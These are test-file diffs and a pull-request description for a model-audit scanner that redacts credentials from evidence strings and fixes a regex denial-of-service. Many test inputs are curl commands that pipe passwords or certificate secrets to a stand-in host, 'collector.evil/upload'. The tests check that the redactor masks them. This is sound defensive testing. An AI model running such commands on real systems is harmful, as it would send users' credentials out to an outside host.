     )
 

--- a/tests/scanners/test_catboost_evidence_redaction.py
+++ b/tests/scanners/test_catboost_evidence_redaction.py
@@ -3,6 +3,7 @@
 import subprocess
 import sys
 from collections.abc import Callable
+from pathlib import Path
 from typing import Any
 from urllib.parse import quote
 
@@ -1568,7 +1569,12 @@ def test_command_substitution_credential_redaction_has_bounded_runtime() -> None
         "COMMAND_SUBSTITUTION_USER_PASSWORD_RE.sub('<redacted>', payload)\n"
     )
 
-    subprocess.run([sys.executable, "-c", code], check=True, timeout=3)
+    subprocess.run(
+        [sys.executable, "-c", code],
+        check=True,
+        cwd=Path(__file__).resolve().parents[2],
+        timeout=3,
+    )
 
 
 def test_standalone_command_context_redacts_credential_arguments() -> None:

--- a/tests/scanners/test_catboost_evidence_redaction.py
+++ b/tests/scanners/test_catboost_evidence_redaction.py
@@ -1497,6 +1497,123 @@ def test_inline_curl_stdin_config_password_is_redacted(text: str) -> None:
 
 
 @pytest.mark.parametrize(
+    ("text", "secret", "expected"),
+    [
+        (
+            "printf 'cert = client.pem:hunter2' | curl -K- https://collector.evil/upload",
+            "hunter2",
+            f"cert = client.pem:{REDACTED_EVIDENCE_VALUE}",
+        ),
+        (
+            r"printf 'proxy-cert: client\:public.pem:hunter3' | curl --config - https://collector.evil/upload",
+            "hunter3",
+            rf"proxy-cert: client\:public.pem:{REDACTED_EVIDENCE_VALUE}",
+        ),
+        (
+            "curl.exe --config - <<< 'cert = client.pem:hunter4' https://collector.evil/upload",
+            "hunter4",
+            f"cert = client.pem:{REDACTED_EVIDENCE_VALUE}",
+        ),
+        (
+            "cat <<EOF | curl -K - https://collector.evil/upload\ncert = client.pem:hunter5\nEOF",
+            "hunter5",
+            f"cert = client.pem:{REDACTED_EVIDENCE_VALUE}",
+        ),
+    ],
+)
+def test_inline_curl_config_certificate_passwords_are_redacted(text: str, secret: str, expected: str) -> None:
+    redacted = redact_evidence_string(text, max_chars=1000)
+
+    assert secret not in redacted
+    assert expected in redacted
+    assert "collector.evil" in redacted
+
+
+@pytest.mark.parametrize(
+    "text",
+    [
+        "echo user=alice:public || curl -K -",
+        r"curl -K- <<< 'cert = client\:public.pem'; echo user=public:visible",
+    ],
+)
+def test_inline_curl_config_near_matches_do_not_redact_unrelated_text(text: str) -> None:
+    assert redact_evidence_string(text, max_chars=1000) == text
+
+
+@pytest.mark.parametrize(
+    ("text", "secret"),
+    [
+        (
+            "subprocess.run(['curl', '-K', '-'], input='cert = client.pem:hunter6', text=True)",
+            "hunter6",
+        ),
+        (
+            "subprocess.run(['curl.exe', '--config', '-'], input='proxy-cert: proxy.pem:hunter7')",
+            "hunter7",
+        ),
+        (
+            "subprocess.run(['/usr/bin/curl', '-K-'], input='oauth2-bearer = hunter8')",
+            "hunter8",
+        ),
+        (
+            "subprocess.run('curl -K -', input='user = alice:hunter9', shell=True)",
+            "hunter9",
+        ),
+        (
+            "subprocess.run('sudo -u root curl -K -', input='user = alice:hunter10', shell=True)",
+            "hunter10",
+        ),
+        (
+            "subprocess.run(['curl', '-sK-'], input='user = alice:hunter11')",
+            "hunter11",
+        ),
+        (
+            "subprocess.run(['curl', '-sK', '-'], input='user = alice:' + 'hunter12')",
+            "hunter12",
+        ),
+        (
+            "subprocess.run(['curl', '-K', '-'], input='user=alice:hunter13\\n" + ("x" * 4_090) + "')",
+            "hunter13",
+        ),
+        (
+            "subprocess.run('curl https://example.com; curl -K -', input='user=alice:hunter14', shell=True)",
+            "hunter14",
+        ),
+    ],
+)
+def test_subprocess_curl_stdin_config_passwords_are_redacted(text: str, secret: str) -> None:
+    redacted = redact_evidence_string(text, max_chars=1000)
+
+    assert secret not in redacted
+    assert REDACTED_EVIDENCE_VALUE in redacted
+
+
+@pytest.mark.parametrize(
+    "text",
+    [
+        "subprocess.run(['curl', '-k', '-'], input='user = alice:public')",
+        "subprocess.run(['curl', '-k-'], input='user = alice:public')",
+        "subprocess.run(['curl', '-K=-'], input='user = alice:public')",
+        "subprocess.run('curl https://example.com; echo -K -', input='user=alice:public', shell=True)",
+        "subprocess.run('curl https://example.com && cat -K -', input='user=alice:public', shell=True)",
+        "subprocess.run('curl https://example.com | tool -K -', input='user=alice:public', shell=True)",
+    ],
+)
+def test_subprocess_curl_config_option_near_matches_are_preserved(text: str) -> None:
+    assert redact_evidence_string(text, max_chars=1000) == text
+
+
+def test_subprocess_curl_benign_static_config_input_is_preserved() -> None:
+    texts = [
+        'subprocess.run(["curl", "-K", "-"], input="public=value")',
+        r"subprocess.run(['curl', '-K', '-'], input=b'\xffpublic=value')",
+    ]
+
+    for text in texts:
+        assert redact_evidence_string(text, max_chars=1000) == text
+
+
+@pytest.mark.parametrize(
     ("option", "entry", "expected"),
     [
         ("--config", "user = alice:hunter2", f"user = alice:{REDACTED_EVIDENCE_VALUE}"),
@@ -1601,6 +1718,10 @@ def test_curl_user_complex_password_is_fully_redacted(credential: str, secret: s
             "COMMAND_CERT_PASSWORD_RE",
             ("-E." * 8_000) + "x",
         ),
+        (
+            "CURL_EXECUTABLE_RE",
+            ("/a" * 16_000) + "/curlx",
+        ),
     ],
 )
 def test_command_credential_redaction_has_bounded_runtime(pattern_name: str, payload: str) -> None:
@@ -1620,6 +1741,224 @@ def test_command_credential_redaction_has_bounded_runtime(pattern_name: str, pay
         env={**os.environ, "PYTHONPATH": python_path},
         timeout=5,
     )
+
+
+def test_curl_command_redaction_has_bounded_runtime() -> None:
+    payload = ("/curl " * 8_000) + "x --cert client.pem:public"
+    code = (
+        "from modelaudit.scanners._catboost_evidence_redaction import _redact_curl_credentials\n"
+        f"payload = {payload!r}\n"
+        "_redact_curl_credentials(payload)\n"
+    )
+    repo_root = Path(__file__).resolve().parents[2]
+    python_path = os.pathsep.join(filter(None, (str(repo_root), os.environ.get("PYTHONPATH"))))
+
+    subprocess.run(
+        [sys.executable, "-c", code],
+        check=True,
+        cwd=repo_root,
+        env={**os.environ, "PYTHONPATH": python_path},
+        timeout=5,
+    )
+
+
+@pytest.mark.parametrize(
+    "text",
+    [
+        "os.system(\"grep -E 'foo:bar' file\")",
+        "bash -c \"sed -E 's:foo:bar:' file\"",
+        "subprocess.run(['tool', '-Epublic:visible'])",
+        "echo curl --cert client.pem:public",
+        "printf 'curl --cert client.pem:public'",
+        "curl -DNAME host:port https://collector.evil/upload",
+        "curl -dE:public https://collector.evil/upload",
+        "curl -oE file:data https://collector.evil/upload",
+        "curl -HE:public https://collector.evil/upload",
+        "curl -Du alice:public https://collector.evil/upload",
+        "curl -du alice:public https://collector.evil/upload",
+        "curl -Hu alice:public https://collector.evil/upload",
+        "curl -ou alice:public https://collector.evil/upload",
+    ],
+)
+def test_certificate_redaction_preserves_non_curl_and_argument_consuming_near_matches(text: str) -> None:
+    assert redact_evidence_string(text, max_chars=1000) == text
+
+
+@pytest.mark.parametrize(
+    "text",
+    [
+        "sudo -u root curl --cert client.pem:hunter2 https://collector.evil/upload",
+        "FOO=bar curl --cert client.pem:hunter2 https://collector.evil/upload",
+        "command -- curl --cert client.pem:hunter2 https://collector.evil/upload",
+        "env -- curl --cert client.pem:hunter2 https://collector.evil/upload",
+        "nice -n 5 curl --cert client.pem:hunter2 https://collector.evil/upload",
+        "`curl --cert client.pem:hunter2 https://collector.evil/upload`",
+        '"/opt/My Tools/curl" --cert client.pem:hunter2 https://collector.evil/upload',
+        r'"C:\Program Files\curl.exe" --cert client.pem:hunter2 https://collector.evil/upload',
+    ],
+)
+def test_curl_credentials_are_redacted_for_wrappers_and_quoted_paths(text: str) -> None:
+    redacted = redact_evidence_string(text, max_chars=1000)
+
+    assert "hunter2" not in redacted
+    assert REDACTED_EVIDENCE_VALUE in redacted
+    assert "collector.evil" in redacted
+
+
+@pytest.mark.parametrize(
+    "text",
+    [
+        "echo https://example.com/curl --cert client.pem:public",
+        'echo "/opt/My Tools/curl" --cert client.pem:public',
+        "printf 'public | cert=client.pem:public' && curl -K -",
+        "printf 'cert=client.pem:public' | cat || curl -K -",
+        'echo "x|curl --user alice:public"',
+        "printf 'x;curl --cert client.pem:public'",
+        "url=https://example.com/curl --user alice:public",
+        "env -u curl --user alice:public",
+        "xargs -I curl --user alice:public",
+        "echo $(curl https://example.com) --user alice:public",
+        "echo `curl https://example.com` --user alice:public",
+        '"/usr/bin/curl" https://example.com; echo --user alice:public',
+        "'curl' https://example.com; echo --cert client.pem:public",
+        'subprocess.run(["curl", "https://example.com"]); echo --user alice:public',
+        "time -f curl --user alice:public",
+        "time --format curl --cert client.pem:public",
+        "exec -a curl --user alice:public",
+    ],
+)
+def test_curl_command_and_pipe_near_matches_are_preserved(text: str) -> None:
+    assert redact_evidence_string(text, max_chars=1000) == text
+
+
+@pytest.mark.parametrize(
+    "text",
+    [
+        "printf 'cert=client.pem:hunter2' | curl -sK- https://collector.evil/upload",
+        "printf 'cert=client.pem:hunter2' | curl -sK - https://collector.evil/upload",
+        "printf 'cert=client.pem:hunter2' | sudo -u root curl -K - https://collector.evil/upload",
+        "printf 'cert=client.pem:hunter2' | cat | curl -K - https://collector.evil/upload",
+    ],
+)
+def test_bundled_and_wrapped_curl_stdin_config_passwords_are_redacted(text: str) -> None:
+    redacted = redact_evidence_string(text, max_chars=1000)
+
+    assert "hunter2" not in redacted
+    assert f"client.pem:{REDACTED_EVIDENCE_VALUE}" in redacted
+
+
+def test_curl_process_substitution_ignores_escaped_closing_parenthesis() -> None:
+    text = r"curl -K <(echo prefix\) user=alice:hunter2) https://collector.evil/upload"
+
+    redacted = redact_evidence_string(text, max_chars=1000)
+
+    assert "hunter2" not in redacted
+    assert f"user=alice:{REDACTED_EVIDENCE_VALUE}" in redacted
+
+
+@pytest.mark.parametrize(
+    "text",
+    [
+        "curl -K - --data '<<< user=alice:public' https://collector.evil/upload",
+        "curl -K - --data 'text <<EOF'\nuser=alice:public\nEOF",
+    ],
+)
+def test_quoted_shell_input_operators_are_preserved(text: str) -> None:
+    redacted = redact_evidence_string(text, max_chars=1000)
+
+    assert "alice:public" in redacted
+    assert REDACTED_EVIDENCE_VALUE not in redacted
+
+
+@pytest.mark.parametrize(
+    "text",
+    [
+        "curl --user alice:correct\\\nhorse https://collector.evil/upload",
+        "curl --cert client.pem:correct\\\nhorse https://collector.evil/upload",
+    ],
+)
+def test_curl_passwords_consume_shell_line_continuations(text: str) -> None:
+    redacted = redact_evidence_string(text, max_chars=1000)
+
+    assert "correct" not in redacted
+    assert "horse" not in redacted
+    assert REDACTED_EVIDENCE_VALUE in redacted
+    assert "collector.evil" in redacted
+
+
+@pytest.mark.parametrize(
+    "text",
+    [
+        "env NOTE='x;y' curl --user alice:hunter2 https://collector.evil/upload",
+        "FOO='x&y' curl --cert client.pem:hunter2 https://collector.evil/upload",
+        "if curl --user alice:hunter2 https://collector.evil/upload; then echo ok; fi",
+        "if true; then curl --cert client.pem:hunter2 https://collector.evil/upload; fi",
+        "! curl --user alice:hunter2 https://collector.evil/upload",
+    ],
+)
+def test_curl_credentials_are_redacted_in_shell_command_positions(text: str) -> None:
+    redacted = redact_evidence_string(text, max_chars=1000)
+
+    assert "hunter2" not in redacted
+    assert REDACTED_EVIDENCE_VALUE in redacted
+
+
+def test_nested_curl_command_ranges_do_not_corrupt_redaction() -> None:
+    text = "curl $(curl --user a:x https://inner) --user b:y https://outer"
+
+    redacted = redact_evidence_string(text, max_chars=1000)
+
+    assert "a:x" not in redacted
+    assert "b:y" not in redacted
+    assert redacted.count(REDACTED_EVIDENCE_VALUE) == 2
+
+
+@pytest.mark.parametrize(
+    "text",
+    [
+        r"curl --cert client.pem:correct\ horse\;battery\|staple\) https://collector.evil/upload",
+        r"curl --user alice:correct\ horse\;battery https://collector.evil/upload",
+    ],
+)
+def test_unquoted_curl_passwords_consume_shell_escaped_delimiters(text: str) -> None:
+    redacted = redact_evidence_string(text, max_chars=1000)
+
+    for fragment in ("correct", "horse", "battery", "staple"):
+        assert fragment not in redacted
+    assert REDACTED_EVIDENCE_VALUE in redacted
+    assert "collector.evil" in redacted
+
+
+def test_unterminated_quoted_curl_user_password_is_fully_redacted() -> None:
+    text = 'curl --user "alice:correct horse battery staple'
+
+    redacted = redact_evidence_string(text, max_chars=1000)
+
+    assert "correct" not in redacted
+    assert "horse" not in redacted
+    assert "battery" not in redacted
+    assert "staple" not in redacted
+    assert f"alice:{REDACTED_EVIDENCE_VALUE}" in redacted
+
+
+def test_truncated_long_quoted_curl_user_password_is_fully_redacted() -> None:
+    text = 'curl --user "alice:correct horse ' + ("x" * 5000) + '" https://collector.evil/upload'
+
+    redacted = redact_evidence_string(text, max_chars=120)
+
+    assert "correct" not in redacted
+    assert "horse" not in redacted
+    assert f"alice:{REDACTED_EVIDENCE_VALUE}" in redacted
+
+
+def test_curl_command_substitution_with_escaped_parenthesis_is_fully_redacted() -> None:
+    text = r"curl -u alice:$(echo hunter2\)) https://collector.evil/upload"
+
+    redacted = redact_evidence_string(text, max_chars=1000)
+
+    assert "hunter2" not in redacted
+    assert f"alice:{REDACTED_EVIDENCE_VALUE}" in redacted
+    assert "collector.evil" in redacted
 
 
 def test_standalone_command_context_redacts_credential_arguments() -> None:
@@ -2748,6 +3087,16 @@ def test_curl_separated_argv_credential_password_is_redacted(
 )
 def test_curl_separated_argv_credential_near_matches_are_preserved(text: str) -> None:
     assert redact_evidence_string(text, max_chars=1000) == text
+
+
+@pytest.mark.parametrize("executable", ["curl.exe", "/usr/bin/curl", r"C:\tools\curl.exe"])
+def test_path_qualified_curl_argv_certificate_password_is_redacted(executable: str) -> None:
+    text = f"subprocess.run([{executable!r}, '--cert', 'client.pem:hunter9'])"
+
+    redacted = redact_evidence_string(text, max_chars=1000)
+
+    assert "hunter9" not in redacted
+    assert f"client.pem:{REDACTED_EVIDENCE_VALUE}" in redacted
 
 
 def test_ambiguous_drive_letter_certificate_argv_is_redacted() -> None:

--- a/tests/scanners/test_catboost_evidence_redaction.py
+++ b/tests/scanners/test_catboost_evidence_redaction.py
@@ -1561,12 +1561,33 @@ def test_curl_user_complex_password_is_fully_redacted(credential: str, secret: s
     assert "collector.evil.example" in redacted
 
 
-def test_command_substitution_credential_redaction_has_bounded_runtime() -> None:
+@pytest.mark.parametrize(
+    ("pattern_name", "payload"),
+    [
+        (
+            "COMMAND_CERT_PASSWORD_QUOTED_RE",
+            '--cert "cert.pem:' + (r"\(" * 26),
+        ),
+        (
+            "COMMAND_QUOTED_USER_PASSWORD_RE",
+            '--user "alice:' + (r"\(" * 26),
+        ),
+        (
+            "COMMAND_SUBSTITUTION_USER_PASSWORD_RE",
+            "-u:$(" + (r"\(" * 26),
+        ),
+        (
+            "COMMAND_CONFIG_QUOTED_USER_PASSWORD_RE",
+            'user = "alice:' + (r"\(" * 26),
+        ),
+    ],
+)
+def test_command_credential_redaction_has_bounded_runtime(pattern_name: str, payload: str) -> None:
     code = (
         "from modelaudit.scanners._catboost_evidence_redaction import "
-        "COMMAND_SUBSTITUTION_USER_PASSWORD_RE\n"
-        "payload = '-u:$(' + r'\\(' * 26\n"
-        "COMMAND_SUBSTITUTION_USER_PASSWORD_RE.sub('<redacted>', payload)\n"
+        f"{pattern_name}\n"
+        f"payload = {payload!r}\n"
+        f"{pattern_name}.sub('<redacted>', payload)\n"
     )
 
     subprocess.run(

--- a/tests/scanners/test_catboost_evidence_redaction.py
+++ b/tests/scanners/test_catboost_evidence_redaction.py
@@ -1,5 +1,6 @@
 """Tests for scanner evidence redaction helpers."""
 
+import os
 import subprocess
 import sys
 from collections.abc import Callable
@@ -1580,6 +1581,22 @@ def test_curl_user_complex_password_is_fully_redacted(credential: str, secret: s
             "COMMAND_CONFIG_QUOTED_USER_PASSWORD_RE",
             'user = "alice:' + (r"\(" * 26),
         ),
+        (
+            "COMMAND_CERT_PASSWORD_QUOTED_RE",
+            '--cert "' + ("a:" * 8_000),
+        ),
+        (
+            "COMMAND_QUOTED_USER_PASSWORD_RE",
+            '--user "' + ("a:" * 8_000),
+        ),
+        (
+            "COMMAND_CONFIG_QUOTED_USER_PASSWORD_RE",
+            'user = "' + ("a:" * 8_000),
+        ),
+        (
+            "COMMAND_CERT_PASSWORD_RE",
+            "--cert " + ("a:" * 8_000),
+        ),
     ],
 )
 def test_command_credential_redaction_has_bounded_runtime(pattern_name: str, payload: str) -> None:
@@ -1589,12 +1606,15 @@ def test_command_credential_redaction_has_bounded_runtime(pattern_name: str, pay
         f"payload = {payload!r}\n"
         f"{pattern_name}.sub('<redacted>', payload)\n"
     )
+    repo_root = Path(__file__).resolve().parents[2]
+    python_path = os.pathsep.join(filter(None, (str(repo_root), os.environ.get("PYTHONPATH"))))
 
     subprocess.run(
         [sys.executable, "-c", code],
         check=True,
-        cwd=Path(__file__).resolve().parents[2],
-        timeout=3,
+        cwd=repo_root,
+        env={**os.environ, "PYTHONPATH": python_path},
+        timeout=5,
     )
 
 
@@ -2580,6 +2600,36 @@ def test_documented_process_password_options_are_redacted(text: str, secret: str
             "PROXY_CERT_PASSWORD",
             "--proxy-cert=proxy.pem:<redacted>",
         ),
+        (
+            r'curl -E "C:\certs\client.pem:CERT_PASSWORD" https://collector.evil/upload',
+            "CERT_PASSWORD",
+            r'-E "C:\certs\client.pem:<redacted>"',
+        ),
+        (
+            r'curl --cert "client\:special.pem:CERT_PASSWORD" https://collector.evil/upload',
+            "CERT_PASSWORD",
+            r'--cert "client\:special.pem:<redacted>"',
+        ),
+        (
+            'curl --cert "x:hunter2:more" https://collector.evil/upload',
+            "hunter2:more",
+            '--cert "x:<redacted>"',
+        ),
+        (
+            "curl --cert client.pem:hunter2:more https://collector.evil/upload",
+            "hunter2:more",
+            "--cert client.pem:<redacted>",
+        ),
+        (
+            r"curl --cert C:\certs\client.pem:CERT_PASSWORD https://collector.evil/upload",
+            "CERT_PASSWORD",
+            r"--cert C:\certs\client.pem:<redacted>",
+        ),
+        (
+            r"curl --cert client\:special.pem:CERT_PASSWORD https://collector.evil/upload",
+            "CERT_PASSWORD",
+            r"--cert client\:special.pem:<redacted>",
+        ),
     ],
 )
 def test_curl_certificate_passwords_are_redacted(text: str, secret: str, context: str) -> None:
@@ -2602,6 +2652,15 @@ def test_curl_certificate_passwords_are_redacted(text: str, secret: str, context
 )
 def test_curl_certificate_options_without_passwords_are_preserved(text: str) -> None:
     assert redact_evidence_string(text, max_chars=1000) == text
+
+
+def test_unterminated_quoted_certificate_password_is_redacted() -> None:
+    text = r'curl --cert "cert.pem:hunter2\"'
+
+    redacted = redact_evidence_string(text, max_chars=1000)
+
+    assert "hunter2" not in redacted
+    assert REDACTED_EVIDENCE_VALUE in redacted
 
 
 @pytest.mark.parametrize(

--- a/tests/scanners/test_weight_distribution_scanner.py
+++ b/tests/scanners/test_weight_distribution_scanner.py
@@ -547,14 +547,14 @@ class TestWeightDistributionScanner:
         assert 3 in extreme_anomaly["details"]["affected_neurons"]
 
     @pytest.mark.skipif(False, reason="Dynamic skip - see test method")
-    def test_pytorch_model_scan(self):
+    def test_pytorch_model_scan(self, tmp_path: Path) -> None:
         """Test scanning a PyTorch model with anomalous weights"""
         if not has_torch():
             pytest.skip("PyTorch not installed")
 
         import torch
 
-        scanner = WeightDistributionScanner()
+        scanner = WeightDistributionScanner({"enable_unsafe_torch_load": True})
 
         # Create a simple model with anomalous weights
         class SimpleModel(torch.nn.Module):
@@ -570,29 +570,23 @@ class TestWeightDistributionScanner:
 
         model = SimpleModel()
 
-        # Save model
-        with tempfile.NamedTemporaryFile(suffix=".pt", delete=False) as f:
-            torch.save(model.state_dict(), f.name)
-            temp_path = f.name
+        model_path = tmp_path / "model.pt"
+        torch.save(model.state_dict(), model_path)
 
-        try:
-            result = scanner.scan(temp_path)
-            assert result.success
+        result = scanner.scan(str(model_path))
+        assert result.success
 
-            # If no issues found, it might be because the scanner couldn't extract weights
-            # This test is more about integration than specific anomaly detection
-            # So we'll make it more lenient
-            if len(result.issues) == 0:
-                # Check if any layers were analyzed
-                assert result.metadata.get("layers_analyzed", 0) >= 0
-            else:
-                # Check that anomaly was detected - could be either type
-                has_magnitude = any("abnormal weight magnitudes" in issue.message for issue in result.issues)
-                has_extreme = any("extremely large weight values" in issue.message for issue in result.issues)
-                assert has_magnitude or has_extreme
-
-        finally:
-            os.unlink(temp_path)
+        # If no issues found, it might be because the scanner couldn't extract weights
+        # This test is more about integration than specific anomaly detection
+        # So we'll make it more lenient
+        if len(result.issues) == 0:
+            # Check if any layers were analyzed
+            assert result.metadata.get("layers_analyzed", 0) >= 0
+        else:
+            # Check that anomaly was detected - could be either type
+            has_magnitude = any("abnormal weight magnitudes" in issue.message for issue in result.issues)
+            has_extreme = any("extremely large weight values" in issue.message for issue in result.issues)
+            assert has_magnitude or has_extreme
 
     @pytest.mark.skipif(False, reason="Dynamic skip - see test method")
     def test_keras_model_scan(self):


### PR DESCRIPTION
## Summary

- eliminate the CatBoost credential-redaction ReDoS reported by CodeQL
- make equivalent quoted-value regex branches mutually exclusive
- align curl and subprocess candidate budgets with every expensive discovery path
- preserve false-positive boundaries for prose, URLs, option near matches, and echoed commands
- cover wrapped, shell-concatenated, quoted-option, config, netrc, cookie, and stdin-path curl credentials

## Security review

The audit found four additional ambiguous backslash branches, a `curl-` candidate-budget bypass, repeated malformed `subprocess.run(` suffix rescans, and a broader hyphenated-text ReDoS in direct assignment matchers. All now have bounded or signal-gated paths.

False-negative fixes cover static shell executable concatenation, `busybox`/`setsid` and additional shell wrappers, dashed curl config entries, stdin file paths, separately quoted options, and config/cookie process substitutions.

False-positive regressions cover `--user-agent=`, echoed concatenated executables, URL path near matches, benign control-key near matches, and unrelated shell sources.

## Validation

- affected test module: `575 passed`
- Ruff format/check on changed files: clean
- mypy on changed files: clean
- `git diff --check`: clean
- 3.2 KiB `a-` adversarial input: about 0.006s, down from about 7.4s
- exact published head: `965877204232c285b5dbade68b0029c560a745d6`
- exact published tree: `7f53a92d5b02764d66aa3a15e268dda50b842395`
- refreshed onto `main` at `2484ac7e8374e0b5819cac46fafa7df7ba3548e3`

All live review threads are resolved. Dependency #1597 is merged.

Resolves [CodeQL alert #45](https://github.com/promptfoo/modelaudit/security/code-scanning/45).